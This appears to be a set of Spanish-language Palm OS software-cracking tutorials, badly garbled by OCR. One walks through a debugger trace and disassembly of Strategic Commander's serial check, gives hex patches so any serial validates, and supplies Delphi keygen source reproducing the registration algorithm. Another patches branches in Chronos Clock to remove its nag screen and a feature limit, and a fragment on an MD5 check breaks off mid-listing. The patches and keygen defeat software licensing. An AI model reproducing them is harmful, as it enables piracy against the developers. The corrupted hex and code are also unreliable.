D7 = 00030006 

Si observamos detenidamente estas instrucciones estan en formato hexadecimal, Así para 
su valor en decimal es "9142" registrémonos con este último en el emulador ó en mi palm Tungteng T5 
real, Ohhhh el programa se registra como si nada pero solo para un HotSync/Name de "compaq" 
Abajo se muestra lo que debemos de estar observando: 


Palm Debugger 
File Edit Connection Source Window Help 


Debugger AS ANTES 
D005F7C8  *ADDQ.W *$01,D3 | 5243 2 z 
DOOSF7CA *CMP.W D7,D3 | B647 

will Branch 
DOOSF7CC  *BCS.S *-$004A ; 0005F782 | 65B4 
D005F7382 *MOVEQ.L  **$00,D0 | 7000 
D005F734  *MOVE.W D3,D0 | 3003 
D005F786 *LEA -$000C(A6),A0 | 41EE FFF4 
DOOSF73A *MOVEQ.L  **$00,D5 | 7ADO 
DOO5F78C  *MOVE.B $00CA0,DO.L),D5 | 1430 0800 
DOO5F730 *LSR.W *$01,D0 | Ez48 
D005F7392 *ADD.W DO,DO | DO40 
0005F734  *MOVE.W DO,D6 About | 3c00 
DOOS5F796 *CMP.W D3,D6 | BC43 
cooErraA oo OS O ME 
! Copyright 1995-2000 Palm, Inc. | 
DOOSF79C  *EXT.W DO opyrIg . | 4880 
DOOSF79E *MULU.W D5,DO | cocs 
DOOSF7AD *CMP.W 03,06 | BC43 
DOOSF7A2 *SEQ.B D1 | 57c1 
DOO5F7A4  *NEG.B D1 | 4401 
DOOSF7AGS *EXT.W D1 | 4881 
DOOSF7AS  *MULU.W D5,D1 | c2c5 
DOOSF7AA  *MOVE.W D3,D2 | 3403 ” 
DOOSF7AC  *ADDO.W *$01,D2 | 5242 
DOOSF7AE  *MULU.W D1,D2 | cací - CPU Registers ME El 
DOO5F7BO *ADD.wW DO,D2 | D440 DO: ODOLDODO ' 
DOOS5F7B2 *MULU.W *$07,D2 | C4FC 0007 D1: 00000000 q] 
DOO5F7B6 *TST.W D3 | 4443 D2: 00000317 
0005F7E3 *SEQ.B DO | 57c0 2 AMOODOOS 
DOOSF7BA *NEG.B DO | 440607 > PT 000023BÉ "> 
DOOSF7EC *EXT.W DO TT 480 O T—0000007 1 
DOOSF7BE *MULU.W *$9D,D0 7 | COFC 0190 Dé: 00000004 
DOOSF7C2 *ADD.W D2,D0 A | DO42 07: 00030006 
DOOSF7C4  *ADD.W D4,D0 Maa | D044 : 
DOOSF7C6  *MOVE.W DO,D4 es 3800 . 
D005F7C38  *ADDO.W *$01,03 Y | 5243 Pel AS 
DOOSF7CA *CMP.W D7,D3 e | 6647 A2: DODD49DA 
DOOSF7CC  *BCS.S *-$004A y 0005F782 | 65B4 AG: O00063DC 
DOOSF7CE *MOVE.L A3,DO dí | 2008 AB: ODDOSCSS 
DOOSF7DO  *CMP.wW DO,D4 | B840 AE: ODO3B9DC 
1 A7: 0003B9A0 
de] 5 
- Source AQUA | sr: tsxnzwc 0 


ASA 


y 

dm d4 100 <--—- De nada nos servirá ver que hay aqui 

000023B6: 10 19 25 2E 10 19 25 DO 10 19 25 FA 10 19 27 1C "..8S...8S...S...'." 
000023C6: 10 19 28 3E 10 19 29 60 10 19 2A 82 10 19 2B AS "..(>..) ..*...+." 
000023D6: 10 19 2C C6 10 19 2E E8 10 19 30 76 10 19 33 D8 "..,....... 0V.. 3." 
000023E6: 10 19 36 D2 10 19 38 28 10 19 38 62 00 00 00 2€C "..6...8(..8b...," 
000023F6: 10 00 04 53 00 00 23 10 00 01 00 03 FO EC 20 00 "...S..H....... Pd 
00002406: 10 19 39 5E 00 00 24 16 10 19 39 5E 00 00 00 05 "..9%..8...9%...." 
00002416: 10 19 39 5E 00 00 24 26 00 00 00 1C 10 00 04 67 "..9%..8$8....... g" 
00002426: 10 19 39 E8 10 19 3A 50 10 19 3B C6 10 19 3C 5C "..9...:P..¡...<" 
00002436: 10 19 3D CA 00 00 02 F2 00 00 04 73 00 03 00 03 "..=........ Sia 
00002446: 00 00 00 00 63 6E 63 70 6D 6F 64 6D 00 03 BB BO "....cncpmodm...." 
00002456: 00 00 00 00 00 00 00 BE 00 00 00 00 43 48 50 52 "............ CHPR" 
00002466: 6E 65 74 77 00 00 00 00 00 00 00 00 00 03 00 03 "netW............ y 
00002476: 00 00 00 00 64 62 73 2D 70 73 79 73 00 03 A6 20 "....dbs-psySs... " 


00002486: 00 00 00 00 00 00 00 C6 00 00 00 00 00 00 00 00 "......ooo........ y 
00002496: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ".....ooo........ dl 
000024A6: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .....ooo........ si 
dm d0 100 <--- De nada nos servirá ver que hay aqui 

00010000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "......oo.o........ al 
00010010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "..o....oo......... yl 
00010020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ".....oo......... ” 
00010030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ".....ooo........ di 
00010040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ".....ooo........ di 
00010050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ".....ooo........ dl 
00010060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ".....ooo........ * 


00010070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "....ccoooo....... " 
00010080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "...ccocoo.o..... " 
00010090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "....ccoocoo.o..... " 
000100A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "....ccccoo.o...... " 
000100B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "...cccoccoo....... il 
000100C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "...cccccoo.o..... il 
000100D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "...cccoccoo....... il 
000100E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "....ccocoo.o..... il 
000100F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "....cccocco.o..... il 


Vemos que el debugger en la instruccón 


0005F7CE *MOVE.L A3,DO | 200B 

0005F7DO *CMP.W DO,D4 | B840 <-—-—- Aqui comprueba Fake serial con el Real 
Will Branch 

0005F7D2 *BNE.S *+$0028 ; O005F7FA | 6626 


Se en cuentra en el archivo desensamblado en CODE (Seg: 0x01) en el código muerto: 


00006816 CO FC 01 9D MULU.W +$019D, DO 
0000681A DO 42 ADD.W D2, DO 

0000681C DO 44 ADD.W D4, DO 

0000681E 38 00 MOVE.W DO, D4 

00006820 52 43 ADD.W $$1, D3 

loc_6822: 

00006822 B6 47 CMP.W D7, D3 

00006824 65 B4 BCS.S LOC_67DA 

00006826 20 OB MOVE.L A3, DO 


<--- Aqui comprueba Fake serial con el Real 


0000682A 66 26 BNE.S LOC_6852 
0000682C 4A AE 00 10 TST.L $10(A6) 
00006830 67 1C BEQ.S LOC_684E 
00006832 70 00 MOVE.L *+$0, DO 

00006834 30 04 MOVE.W D4, DO 

00006836 2F 00 MOVE.L DO, -(A7) 

00006838 48 6E FF E4 PEA.L -$1C(A6) 
0000683C 4E 4F AO C9 SysTrap StrIToA 
00006840 50 4F ADD.W +$8, A7 

00006842 2F 08 MOVE.L AO, -(A7) 

00006844 2F 2E 00 10 MOVE.L $10(A6), -(A7) 
00006848 4E 4F AO C5 SysTrap StrCopy 
0000684C 50 4F ADD.W +58, A7 


OPCION Il : Parchar la rutina de comprobación y hacer que se valide cualquier serial (Opción 
sucia) 


0000681A DO 42 ADD.W D2, DO 
0000681C DO 44 ADD.W D4, DO 
0000681E 38 00 MOVE.W DO, D4 
00006820 52 43 ADD.W +$$1, D3 
loc_6822: 

00006822 B6 47 CMP.W D7, D3 
00006824 65 B4 BCS.S LOC_67DA 
00006826 20 OB MOVE.L A3, DO 


<-—-- Aquí el serial basura se compruebe así mismo 


0000682A 66 26 BNE.S LOC_6852 
0000682C 4A AE 00 10 TST.L $10(A6) 
00006830 67 1C BEQ.S LOC_684E 
00006832 70 00 MOVE.L +$0, DO 
00006834 30 04 MOVE.W D4, DO 
00006836 2F 00 MOVE.L DO, -(A7) 


Buscando en nuestro editor hexadecimal favorito buscamos la cadena : 


"B6 47 65 B4 20 0B XEM 66 26 4A AE 67 1C 70 00" 
y la cambiamos por : 
"B6 47 65 B4 20 0B ¡NET 66 26 4A AE 67 1C 70 00" 


EOR: Es el "O" exclusivo , admite únicamente el direccionamiento directo a registro para el operando fuente , mientras que el operando destino admite 
también todos menos los direccionamientos directo a registro de direcciones y los relativos a PC. 


la única diferencia es que debemos de introducir 5 dígitos a la hora de registrarnos, esto por la protección que vimos al comienzo y nos llevo a encontrar 
lo que estabamos buscando. 


No conformes con esto, debemos hacer que nos valide cualquier cantidad de mas de 6 ó menos de 6 digitos, cambiaremos la instrucción 
parchada por: 


0000681A DO 42 ADD.W D2, DO 

0000681C DO 44 ADD.W D4, DO 

0000681E 38 00 MOVE.W DO, D4 

00006820 52 43 ADD.W +$$1, D3 

loc_6822: 

00006822 B6 47 CMP.W D7, D3 

00006824 65 B4 BCS.S LOC_67DA 

00006826 20 OB MOVE.L A3, DO 

<--- Poner en Verdadera=0 esta instrucción 
0000682A 66 26 BNE.S LOC_6852 

0000682C 4A AE 00 10 TST.L $10(A6) 

00006830 67 1C BEO.S LOC_684E 
00006832 70 00 MOVE.L +$0, DO 
00006834 30 04 MOVE.W D4, DO 
00006836 2F 00 MOVE.L DO, -(A7) 


Ohhh , Hoy es uno más de nuestros días de suerte , al registrar vemos que solo acepta 5 dígitos de lo 
contrario se nos muestra una NAG, Presionamos , Register, y el mismo programa nos canta el verdadero 
serial, Con esto hicimos un generador de llaves inverso en el mismo programa, Unicamente pondremos una 
nota en el programa en la ventana de registro, no conseguimos que se nos valide más de 5 digitos pero 
a Cambio el programador de esta aplicación es tan humano que nos regalo la rutina de comprobación y la 
cual se nos muestra en la misma casilla de texto donde nos registramos (Esto al volver intentar 
registrarnos). 
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JaaaaJaaa !!!! , No paraba en revolcarme de la risa y saber que el juego parecía registrarse con cualquier serial basura y después mostrarme el verdadero 
serial en la casilla de texto donde dice Key: 


OPCION HI : Hacer un KeyGen (Opción limpia) 


Tal y como habíamos quedado en la última entrega, se hace necesario un estudio somero de la 
rutina de chequeo para generar un serial bueno y poder registrar así nuestro programa. Esto 
sería un crack “limpio”, un crack que implica conocimiento y natural al programa, no como los 
parches, que son cracks “sucios”, muy buenos cuando se empieza pero insuficientes cuando ya se 
tiene algo de nivel. 

El código al que habíamos llegado era éste: 


Segmento de Código desensamblado : Strategic Commander 1.1 (0x01) 
Previamente desensamblado con PalmDemon v0.27 
Con PilotDis el desensamblado será diferente en los offsets 


0000677A 2F OA MOVE.L A2, -(A7) ; carga HotSync en la pila. El fake, en A3 

0000677C 4E 4F AO C7 SysTrap StrLen ; calcula tamano de mi HotSync y lo mete en DO en hexa 
00006780 0C 40 00 OA CMP.W *$000A, DO ¡compara el tamano de HotSync con 10 

00006784 58 4F ADD.W +$4, A7 ; corrige la pila 


00006786 63 36 BLS.S LOC_67BE ; salta, ya que X-Grimator mide 10 (branch less or same) 
Este trozo de código es si el HotSync es superior a 10 caracteres 

00006788 48 78 00 05 PEA.L $5 

0000678C 2F OA MOVE.L A2, -(A7) 

0000678E 48 6E FF F4 PEA.L -$C(A6) 

00006792 4E 4F AO 26 SysTrap MemMove 

00006796 2F OA MOVE.L A2, -(A7) 

00006798 4E 4F AO C7 SysTrap StrLen 

0000679C 06 40 FF FB ADD.W FSFFFB, DO 

000067A0 36 00 MOVE.W DO, D3 

000067A2 48 78 00 05 PEA.L $5 

000067A6 48 72 30 00 PEA.L $0(A2, D3.W) 

000067AA 48 6E FF F9 PEA.L -$7(A6) 
S 
C 


000067AE 4E 4F AO 26 SysTrap MemMove 

000067B2 42 2E FF FE R.B -$2(A6) 

000067B6 7E OA MOVE.L +*$A, D7 

000067B8 4F EF 00 1C LEA.L $1C(A7), A7 

000067BC 60 16 BRA.S LOC_67D4 

loc_67BE: 

000067BE 2F OA MOVE.L A2, -(A7) ; mi HotSync pasa a la pila 

000067C0 4E 4F AO C7 SysTrap StrLen ; en DO se mete el tamano 

calculado de mi HotSync, en hexa 

000067C4 3E 00 MOVE.W DO, D7 ; DO pasa a D7 en el £ltimo word (xxxx0010 en mi caso) 
000067C6 2F OA MOVE.L A2, -(A7) ; HotSync pasa a la pila 

000067C8 48 6E FF F4 PEA.L -$C(AG6) 

000067CC 4E 4F AO C5 SysTrap StrCopy ; HotSync se mete en DO en valor ASCII (As¡, para el HotSync 
"Az", serja 41 [que es A] 7A [que es z]) 

000067D0 4F EF 00 0C LEA.L $C(A7), A7 


loc_67D4: 
000067D4 78 00 MOVE.L +$0, D4 ; D4 se pone a cero. Es el contador 

del n£mero de letras que componen nuestro HotSync 
000067D6 76 00 MOVE.L +$0, D3 ; se pone a cero el contador de cada letra, que es D3 


000067D8 60 48 BRA.S LOC_6822 
loc_6822: 


00006822 B6 47 CMP.W D7, D3 ; mira si la letra que analiza el contador 
D3 es igual al nf£fmero total de letras de 
mi HotSync. As¡, cuando D3 calcule la letra 10, 
coincidir con la de D7 y acabar el checksum 
00006824 65 B4 BCS.S LOC_67DA ; salta mientres queden letras que analizar 


Cortamos cédigo y Continuamos al salto indicado 
loc_67DA: 


000067DA 70 00 MOVE. 
000067DC 30 03 MOV 


L +$0, DO ; pone DO a cero 

.W D3, DO ; D3 marca cero en la primera letra, uno en 

la segunda y lo pasa DO 

000067DE 41 EE FF F4 LEA.L -$C(A6), AO 

000067E2 7A 00 MOVE.L +$0, D5 ; pone D5 a cero 

000067E4 1A 30 08 00 MOVE.B $0(A0, DO.W), D5 ; en D5 se mete el valor ASCII 
de mi primera letra del HotSync 


conforme vimos en línea del offset 000067CC 
000067E8 E2 48 LSR.W +$1, DO ; los bits de DO los desplaza un puesto 
a la derecha en binario. Si se "cayó" un 


bit uno, activa el flag Zero. Así, 
si tenemos en DO0O=00000002 (hexa) pasaría a ser 00000001 binario, ya que 2 hexa es 10 binario, y el flag 
no se activa ya que lo que se "cayo" fue un cero. Esta instrucciónén permite desplazar de uno a ocho 
bits (1 para uno, +2 para dos...) 


000067EA DO 40 ADD.W DO, DO ; DO+DO y lo guarda en DO 

000067EC 3C 00 MOVE.W DO, D6 ; DO pasa a D6 

000067EE BC 43 CMP.W D3, D6 ; compara D3 con D6. De no ser igual, 
DO pasa a ser FF 


de ser igual, DO se convierte en 00 
000067F0 56 CO SNE.S DO 

000067F2 44 00 NEG.B DO ; O-DO (1 bit) y lo guarda en DO 
000067F4 48 80 EXT.W DO 


Segunda parte del cálculo, como veis, no es muy diferente la estructura a la primera 


000067F6 CO C5 MULU.W D5, DO ; D5 por DO y lo guarda en DO 
000067F8 BC 43 CMP.W D3, D6 ; compara D3 con D6 y de ser igual, 
D1 pasa a ser FF. En 

caso contrario, D1 pasa a ser 00 
000067FA 57 C1 SEQ.S D1 

000067FC 44 01 NEG.B D1 ; O-D1 (un bit) y lo guarda en D1 
000067FE 48 81 EXT.W D1 


Tercera parte del cálculo, como veis, no es muy diferente la estructura a la segunda 


00006800 C2 C5 MULU.W D5, D1 ; D5 por D1 y lo guarda en D1 

00006802 34 03 MOVE.W D3, D2 ; mueve D3 y lo pone en D2 

00006804 52 42 ADD.W +$1, D2 ; suma uno a D2 y lo guarda en D2 

00006806 C4 C1 MULU.W D1, D2 ; multiplica D1 por D2 y lo guarda en D2 

00006808 D4 40 ADD.W DO, D2 ; suma DO a D2 y lo guarda en D2 

0000680A C4 FC 00 07 MULU.W +$0007, D2 ; multiplica D2 por siete y lo guarda en D2 
0000680E 4A 43 TST.W D3 ; compara D3 con cero. De ser igual, 

DO pasa a ser FF. En caso contrario, DO se pone como 00 


00006810 57 CO SEQ.S DO 
00006812 44 00 NEG.B DO ; O-DO (1 bit) y lo guarda en DO 
00006814 48 80 EXT.W DO 


Tercera parte del cálculo, como veis, no es muy diferente la estructura a la segunda 


00006816 CO FC 01 9D MULU.W +$019D, DO ; DO multiplicado por 413 

(decimal) y guardado en DO 

0000681A DO 42 ADD.W D2, DO ; DO m s D2 y lo guarda en DO 

0000681C DO 44 ADD.W D4, DO ; D4 ms DO y lo guarda en DO. Suma el c lculo 

de la letra anterior al de ,sta. 

0000681E 38 00 MOVE.W DO, D4 ; DO pasa a D4. Este es el serial total de las 
letras que llevemos analizadas. 

00006820 52 43 ADD.W +$1, D3 ; suma el contador D3 a uno 

loc_6822: 

00006822 B6 47 CMP.W D7, D3 ; vuelve a comparar los contadores 

00006824 65 B4 BCS.S LOC_67DA ; si faltan letras, loopea y vuelve al checksum 

00006826 20 OB MOVE.L A3, DO 

00006828 B8 40 CMP.W DO, D4 ; en D4 est el serial correcto y en DO mi fake 


Pues así es. Os he detallado paso a paso qué hace el programa para que podáis hacer un keygen 

con vuestra herramienta favorita de programación. Yo voy de cabeza a hacer el mío en Delphi, así aprendo 

a programar en Delphi y tambien ya estoy analizando el HB++ http://www.handheld-basic.com (Visual basic en palm que no 
requiere runtime a diferencia de Appforge crossfire que requiere 700 KB Ram para Runtime, este útimo no me da confianza 
aunque la gente diga que es malisimo) ;0). 


En este pequeñísimo anexo apenas os voy a contar un par de detalles importantes que observé en el programa y que pueden ser de especial 
utilidad. 


1: En primer lugar, ¿recordáis esta parte del código tan rara en el Code SEG: 0x01?: 


00006760 2F 0C MOVE.L A4, -(A7) 
00006762 4E 4F AO CE SysTrap StrATol 
00006766 26 40 MOVE.L DO, A3 


0000676E 58 4F ADD.W +54, A7 

00006770 6F 08 BLE.S LOC_677A 

00006772 30 3C 80 OB MOVE.W +$800B, DO 
00006776 60 00 00 DE BRA LOC_6856 


Pues efectivamente, el 65536 (10000 hexa) es el tamaño de un segmento (64k) y también una variable de 


tipo Word para Delphi (ese valor sería el máximo que tomaría). 


2: En segundo lugar, anunciaros que ha vuelto Latigo en http://latigo.cjb.net, que tiene una buena sección 
de Palm Reversing. También tenemos mucho en la web de Quequero, que ha regresado y Carpathia avanza 
con su PalmDeMon. 


3: En tercer lugar, señalaros que lo que ocurría en el otro tutorial (el salto de códigos de listado muerto al 

debuggear) se llama “cargar dinámicamente una dirección de memoria”. Bueno, y nada más. Os adjunto un keygen que hice en Delphi con 
los fuentes, que siempre creí profundamente en el GPL. Ahí veréis como sigo paso a paso el listado ASM y como he puesto comentarios en lo 
más enrevesado. Por cierto, que tiene Huevo de Pascua, je, je... Por último, señalar que sin las explicaciones de BlackDog nunca podría haber 
aprendido nada de Delphi. A él le debo haber podido hacer el keygen y a él dedico este anexito. 

Europa, 07/08/02 


Code Source KeyGen For Strategic Commander 1.0 "Echo en Delphi.Net" 


> 


Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, 
Dialogs, jpeg, ExtCtrls, StdCtrls; 


type 

TPpal = class(TForm) 
Foto: Tlmage; 
Saludo: TLabel; 
Autor: TLabel; 
StaticTextl: TStaticText; 
HostSyncEdit: TEdit; 
CodigoEdit: TEdit; 
HotSyncL: TLabel; 
SerialL: TLabel; 
About: TButton; 


procedure HostSyncEditChange(Sender: TObject); 
procedure AboutClick(Sender: TObject); 
procedure FotoDbIClick(Sender: TObject); 
private 

[ Private declarations ) 

public 

[ Public declarations ) 


procedure TPpal.HostSyncEditChange(Sender: TTObject); 

Var 

D0,D1,D2,D3,D4,D5,D6,D7:word:;//mejor word que integer para evitar num negat 
Caracter:char; 


D7:=length(HostSyncEdit.text);//número total letras HotSync 
D4:=0; 
D3:=0://indice (número de letra del HotSync que se analiza) 


while (D3<D7) do//esto comienza índice por cero como primera letra 
begin 

Caracter: =HostSyncEdit.text[D3+1]://analiza letra cero más uno 
D5:=ord(Caracter); 

DO:=D3; 

DO:=(DO shr 1)*2; 

D6:=DO; 

if D6=D3 then DO:=$0000 else DO:=$FFFF; 
d0:=$0-d0; 

DO:=DS * DO; 

¡f£ D6=D3 then D1:=$FFFF else D1:=$0000; 
d1:=$0-d1; 

D1:=DS * DI; 

D2:=D3+1; 

D2:=D2 * DI; 

D2:=D2 + DO; 

D2:=D2 * 7; 

¡£ D3=0 then DO:=$FFFF else DO:=$0000; 
DO:=$0-DO; 

DO:=DO * 413; 

DO:=D2 + DO; 


inc (D3);//incrementa D3 para cerrar bucle 
end; 
CodigoEdit.Text:= IntToStr(D4); //presentacion decimal 


end; 

procedure TPpal. AboutClick(Sender: TObject); 

begin 

ShowMessage('KeyGen hecho por X-Grimator con una buena ayuda y orientación de Blackdog.'+*13+"El programa es bajo licencia GPL 
y pretende ser un ejercicio para el aprendizaje de Programación Creativa.+*+134+++13+'Europa, 7/08/02”); 

end; 


procedure TPpal.FotoDbIClick(Sender: TObject); 

begin 

ShowMessage (Pedazo Huevo de Pascua acabas de encontrar chaval.'++413+"Te mereces ponerte en contacto conmigo en 
xgrimatorO softhome.net'); 

end; 


end. 


Esto es todo por hoy. 
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Palm Spanish Tutor 


INTRODUCCION 


Al cargar esta utileria nos aparece un formulario con las labels que dicen "UNREGISTERED" y "Registre 
por favor", esta ventana ó formulario dura 6 segundos al cargar el programa. 


[Chronos Clock MTISSENEN! 
Ó , voneo S Friday or contact: 


PilotGear H.Q. at 
PalmPilot”” clock, 4/1 Dn http:7//www.pilotgear.corn 
stopwatch and 55 Phone (817) 461-5944 
timer software. a PM Fax (817) 461-3482 
wersion 0,0,62 
w Strot Registering Chronos will 
Please Register 8:21 pro Fri Apr 15, 2005 remove the delay when you 


Copyright 1997 start up. And you"! feel good. 
ESAndrew Ball Really. | promise. 


UNREGISTERED 2 


El propia autor en la Ayuda incluida nos dice que si registramos podremos hacer rápido las cosas. 


AL ATAQUE 


Con el PalmDemon v0.27 desensamblamos y buscamos la dirección en hexadecimal del Formulario que se carga al 
iniciar el programa que es "1300 (0x514) , la podemos ver en la parte izquierda del PalmDemon si desplegamos el árbol 
de instrucciones . 


Buscamos esta cadena ''0514" con algún editor de textos, La que nos interesa es: 


loc_2A10: 

00002A10 2F 0A MOVE.L A2, -(A7) 

00002A12 4E 4F AO 12 SysTrap MemChunkF ree 
00002A16 58 4F ADD.W +54, A7 
00002A18 74 OA MOVE.L HSA, D2 
00002A1A 0C 6C 03 E8 00.. CMP.W +$03E8, $32(A4) 
00002A20 66 0A BNE.S LOC_2A2C 
0 
D 
B 


00002A22 0C 2€C 01 CMP.B $$2C, $1(A4) 

00002A26 00 DC DC.W +00DC 

00002A28 66 02 BNE.S LOC_2A2C 

00002A2A 74 01 MOVE.L +$1, D2 

loc_2A2C: 

00002A2C 29 42 00 78 MOVE.L D2, $78(A4) 

00002A30 4A 2C 00 72 TST.B $572(A4) 

00002A34 67] 00 00 AC BEQ LOC_2AE2 <-—-—- Aqui cambiar por un BRA (60) Salta siempre 
00002A38 4A 03 TST.B D3 
00002A3A 66] 00 00 A6 BNE LOC_2AE2 <--—- Aqui cambiar por un BRA (60) Salta siempre 
00002A3E 3F 3C 05 14 MOVE.W +$0514, -(A7) <--—- Formulario de Help 


X-ref to Form (About Chronos) 


00002A42 4E 4F Al 6F SysTrap FrmInitForm 
00002A46 24 48 MOVE.L AO, A2 

00002A48 2F 0A MOVE.L A2, -(A7) 

00002A4A 4E 4F Al 74 SysTrap FrmSetActiveForm 
00002A4E 2F 0A MOVE.L A2, -(A7) 

00002A50 4E 4F Al 71 SysTrap FrmDrawForm 


Los cambios que haremos serán: 


loc_2A2C: 
00002A2C 29 42 00 78 MOVE.L D2, $78(A4) 
00002A30 4A 2C 00 72 TST.B $72(A4) 


00002A34 Ey 00 00 AC BRA LOC_2AE2 <--— Con esto logramos quitar la molesta NAG 
00002A38 4A 03 TST.B D3 
00002A3A Ey 00 00 A6 BRA LOC_2AE2 <--— Con esto logramos quitar la molesta NAG 


00002A3E 3F 3C 05 14 MOVE.W +$0514, -(A7) 
Probamos el programa en la Palm real ó el emulador y parece funcionar a la perfección. 


Paso siguiente : 


El limite de las 5 estadistas en modo cronometro es parte del programa (Aun en la versión de 
licencia), El programador debio de haber ponido unas flechas para desplazarse por varias 
estadisticas, podríamos nopearlo pero entonces ya no podremos borrar esas estadisticas, de cualquier 
manera pongo el proceso suponiendo que el programa estubiera limitado a 5 estadísticas, la NAG esta 
en "09C4" ,Cargaremos el debugger y pondremos un Atb "frmalert", entraremos a modo cronometro y 
presionaremos el botón "Lap" hasta que el emulador salte al debugger. 


00001EDC 66 00 01 CC BNE LOC_20AA 
00001EE0 0C 2C 00 01 CMP.B +$2C, $1(A4) 
00001EE4 00 DC DC.W +00DC 

00001EE6 66 00 01 C2 BNE LOC_20AA 
O0O001EEA 45 EC 00 30 LEA.L $30(A4), A2 


O0O001EEE 30 12 MOVE.W (A2), DO 
00001EFO 0C 40 00 04 CMP.W +$0004, DO 


00001EF4 62 1C BHI.S LOC_1F12 <---— Nopeando NOP (4E 71) para que acepte más de 5 estadisticas 


00001EF6 34 00 MOVE.W DO, D2 
00001EF8 52 42 ADD.W +$1, D2 
O0001EFA 34 82 MOVE.W D2, (A2) 


00001EFC 02 80 00 00 FF.. AND.L +$0000FFFF, DO 


00001F02 41 EC 00 48 LEA.L $48(A4), AO 
00001F06 E5 80 ASL.L +52, DO 


00001F08 21 AC 00 40 08.. MOVE.L $40(A4), SO(AO0, DO.W) 


00001F0E 60 00 01 92 BRA LOC_20A2 
loc_1F12: 


00001F12 3F 3C 09 C4 MOVE.W +$09C4, -—(A7) 


X-ref to Alert (Chronos Stopwatch) 
00001F16 4E 4F Al 92 SysTrap FrmAlert 
00001F1A 54 4F ADD.W +$2, A7 

00001F1C 0C 40 00 01 CMP.W +$0001, DO 
00001F20 66 00 01 84 BNE LOC_20A6 
00001F24 42 52 CLR.W (A2) 


<-—-—- Aquí para el debugger 
<-—-- Debugger almacena en DO un 0x5, Compara 1 con 5 
<-—-—- Debugger no salta 


00001F26 39 7C 00 4E 00.. MOVE.W +$004E, $DO(A4) 
00001F2C 61 00 F7 F4 BSR.W SUBROUTINE_1756 


00001F30 60 00 01 74 BRA LOC_20A6 


00001F34 0C 6A 03 EC 00.. CMP.W +SO3EC, 


00001F3A 66 10 BNE.S LOC_1F4C 


$8 (A2) 


00001F3C 39 7C 04 4C 00.. MOVE.W +$044C, $32(A4) 
00001F42 3F 3C 04 4C MOVE.W +$044C, -(A7) 


Más abajo encontramos otra ventana que recuerda que solo podemos crear 5 estadisticas en el 
cronometro, curiosamente esta se activa cuando presionamos el boton del harware real ,ya sea el de 
arriba ó el de abajo,Haremos que nos muestre más listas. 


00002008 66 00 00 9C BNE LOC_20A6 
0000200C 45 EC 00 30 LEA.L $30(A4), A2 


00002010 30 12 MOVE.W (A2), DO 

00002012 0C 40 00 04 CMP.W +$0004, DO 

00002016 

00002018 34 00 MOVE.W DO, D2 

0000201A 52 42 ADD.W +$1, D2 

0000201C 34 82 MOVE.W D2, (A2) 

0000201E 02 80 00 00 FF.. AND.L +$0000FFFF, DO 


00002024 41 EC 00 48 LEA.L $48(A4), AO 
00002028 E5 80 ASL.L +52, DO 


0000202A 21 AC 00 40 08.. MOVE.L $40(A4), SO(AO, DO.W) 


00002030 60 00 00 70 BRA LOC_20A2 
loc_2034: 


00002034 3F 3C 09 C4 MOVE.W +$09C4, -(A7) 


X-ref to Alert (Chronos Stopwatch) 


00002038 4E 4F Al 92 SysTrap FrmAlert 
0000203C 54 4F ADD.W +$$2, A7 

0000203E 0C 40 00 01 CMP.W +$0001, DO 
00002042 66 62 BNE.S LOC_20A6 


Bye. 
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62 1C BHI.S LOC_2034 <--—-— Nopeando NOP (4E 71) para que acepte más de 5 estadisticas 
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()Serial (X)HotSync/ Code ()Trial ()Multiprotección ( )Encriptado ( )Otro 


(O NewBies ( )Intermedio ()Avanzado ( )Master ( )Gúru 
http://www. palmgear. com 


INTRODUCCION 


Esta mas claro y simple que el agua. 


AL ATAQUE 
Código analizado 


00003665 4E 4F AO C7 SysTrap StrlLen 
00003669 58 4F ADD.W 1454, A7 

0000366B 3F 00 MOVE.W DO, -(A7) 

0000366D 48 6É FF F6 PEA.L LVAR_0A 
00003671 4E 4F A2 F1 SysTrap EncDigestMD5 
00003675 76 00 MOVE.L +$0, D3 

00003677 47 ED FE OA LEA.L VAR_1F6, A3 
0000367B 45 EE FF E6 LEA.L SVAR_1A, A2 
0000367F 4F EF 00 1A LEA.L $1A(A7), A7 
loc_3683: 


00003683 10 12 MOVE.B (A2), DO 
00003685 BO 13 CMP.B (A3), DO 


> _36BD <-—-—- Aqui salta a mensaje de serial invalido 
00003689 30 2D FB 96 MOVE.W VAR_46A, DO 

0000368D 67 OA BEQ.S LOC_3699 

0000368F 53 40 SUB.W +$1, DO 
00003691 67 12 BEQ.S LOC_36A5 

00003693 53 40 SUB.W +$1, DO 

00003695 67 1A BEQ.S LOC_36B1 

00003697 60 22 BRA.S LOC_36BB 

loc_3699: 

00003699 3F 3C 27 26 MOVE.W +52726, -(A7) 


X-ref to Alert (Registration) 


0000369D 4E 4F Al 92 SysTrap FrmAlert 


000036A1 
00003643 
loc_36A5: 
000036A5 


X-ref to 


000036A9 
000036AD 
000036AF 
loc_36B1: 
000036B1 


X-ref to 


000036B5 
000036B9 
loc_36BB: 
000036BB 
loc_36BD: 
000036BD 
000036BF 
000036C1 
000036C3 
000036C”7 
000036C9 
000036CD 
000036CF 
000036D3 
000036D5 
000036D”7 
000036D9 
000036DB 
000036DD 
loc_36DF': 
000036DF 


loc_36DF 


000036E3 
000036E7 
000036E9 
loc_36EB: 
000036EB 


X-ref to 


000036EF 
000036F3 
000036F5 
loc_36F7: 
000036F7 


X-ref to 


000036FB 
000036FF 
